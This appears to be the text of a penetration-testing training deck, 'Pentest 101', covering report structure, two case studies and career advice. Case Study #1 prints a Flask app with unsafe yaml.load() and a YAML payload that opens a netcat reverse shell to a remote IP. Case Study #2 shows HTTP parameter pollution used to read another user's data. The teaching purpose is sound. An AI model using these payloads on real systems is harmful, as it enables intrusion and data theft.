  46. 46. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 46 Post-engagement: Reporting Guideline • Executive Summary • Brief high-level summary of the penetration test scope and major finding • Statement of Scope • Statement of Methodology • Statement of Limitations • Testing Narrative • Document any issues encountered during testing • Segmentation Test Results • Finding • Risk raking/severity of each vulnerability • Description of finding • Tools Used • Cleaning up the Environment Post-penetration Test • Provide directions on how clean up should be performed PCI DSS – Penetration Testing Guidance
  47. 47. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 47 Engagement: Case Study #1
  48. 48. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 48 Engagement: Case Study #1 @app.route('/', methods=['GET', 'POST']) def upload_file(): if request.method == 'POST': if 'file' not in request.files: flash('No file part') return redirect(request.url) file = request.files['file'] raw_content = file.read() content = yaml.load(raw_content) return yaml.dump(content) yaml.load()
  49. 49. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 49 Engagement: Case Study #1 https://stackoverflow.com/questions/1773805/how-can-i-parse-a-yaml-file-in-python 1 2
  50. 50. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 50 Engagement: Case Study #1
  51. 51. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 51 Engagement: Case Study #1 File: Exploit.yml some_option: !!python/object/apply:subprocess.call args: [nc 192.168.213.170 1234 -e /bin/bash] kwds: {shell: true}
  52. 52. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 52 Engagement: Case Study #2 3rd party Mobile App Critical Systems 3rd party Dispatcher Server 3rd party DB/Auth Server Internet Isolated Network
  53. 53. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 53 Engagement: Case Study #2 3rd party Mobile App 3rd party Dispatcher Server 3rd party DB/Auth Server POST /userInfo Host: 3rdparty token= <3rdparty-token> POST /userInfo Host: customer userId=1234 Internet Data for the authorized user (1234) Critical Systems Isolated Network
  54. 54. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved Critical Systems Isolated Network 54 Engagement: Case Study #2 3rd party Mobile App 3rd party Dispatcher Server 3rd party DB/Auth Server POST /userInfo Host: 3rdparty token= <3rdparty-token> &aaa=bbb POST /userInfo Host: customer userId=1234&aaa=bbb Internet Data for the authorized user (1234)
  55. 55. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved Critical Systems Isolated Network 55 Engagement: Case Study #2 3rd party Mobile App 3rd party Dispatcher Server 3rd party DB/Auth Server POST /userInfo Host: 3rdparty token= <3rdparty-token> &userId=1235 POST /userInfo Host: customer userId=1234& userId=1235 Internet Data for the authorized user (1235)
  56. 56. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 56 Engagement: Case Study #2 https://www.owasp.org/index.php/Testing_for_HTTP_Parameter_pollution_(OTG-INPVAL-004)
  57. 57. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 57 How to become a Penetration Tester? My Path: - Join security communities in Thailand (2600 Thailand, OWASP Thailand Chapter, TISA, CITEC) - Practice.. practice.. and practice ! - Share what you learn ! - Join the hacking competitions + Capture the Flag games
  58. 58. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 58 How to become a Penetration Tester? https://goo.gl/8cLyPY
  59. 59. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 59 Find security consultant firms in Thailand https://goo.gl/N9DkGM
  60. 60. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 60 Contact GERMANY SEC Consult Unternehmensberatung Deutschland GmbH Bockenheimer Landstraße 17-19 60325 Frankfurt / Main Tel +49 69 175 373 43 | Fax +49 69 175 373 44 Email office-frankfurt@sec-consult.com AUSTRIA SEC Consult Unternehmensberatung GmbH Mooslackengasse 17 1190 Vienna Tel +43 1 890 30 43 0 | Fax +43 1 890 30 43 15 Email office@sec-consult.com LITHUANIA UAB Critical Security, a SEC Consult company Sauletekio al. 15-311 10224 Vilnius Tel +370 5 2195535 Email office-vilnius@sec-consult.com RUSSIA CJCS Security Monitor 5th Donskoy proyezd, 15, Bldg. 6 119334, Moscow Tel +7 495 662 1414 Email info@securitymonitor.ru SINGAPORE SEC Consult Singapore PTE. LTD 4 Battery Road #25-01 Bank of China Building Singapore (049908) Email office-singapore@sec-consult.com CANADA i-SEC Consult Inc. 100 René-Lévesque West, Suite 2500 Montréal (Quebec) H3B 5C9 Email office-montreal@sec-consult.com AUSTRIA SEC Consult Unternehmensberatung GmbH Komarigasse 14/1 2700 Wiener Neustadt Tel +43 1 890 30 43 0 Email office@sec-consult.com THAILAND SEC Consult (Thailand) Co.,Ltd. 29/1 Piyaplace Langsuan Building 16th Floor, 16B Soi Langsuan, Ploen Chit Road Lumpini, Patumwan | Bangkok 10330 Email office-vilnius@sec-consult.com www.sec-consult.com

×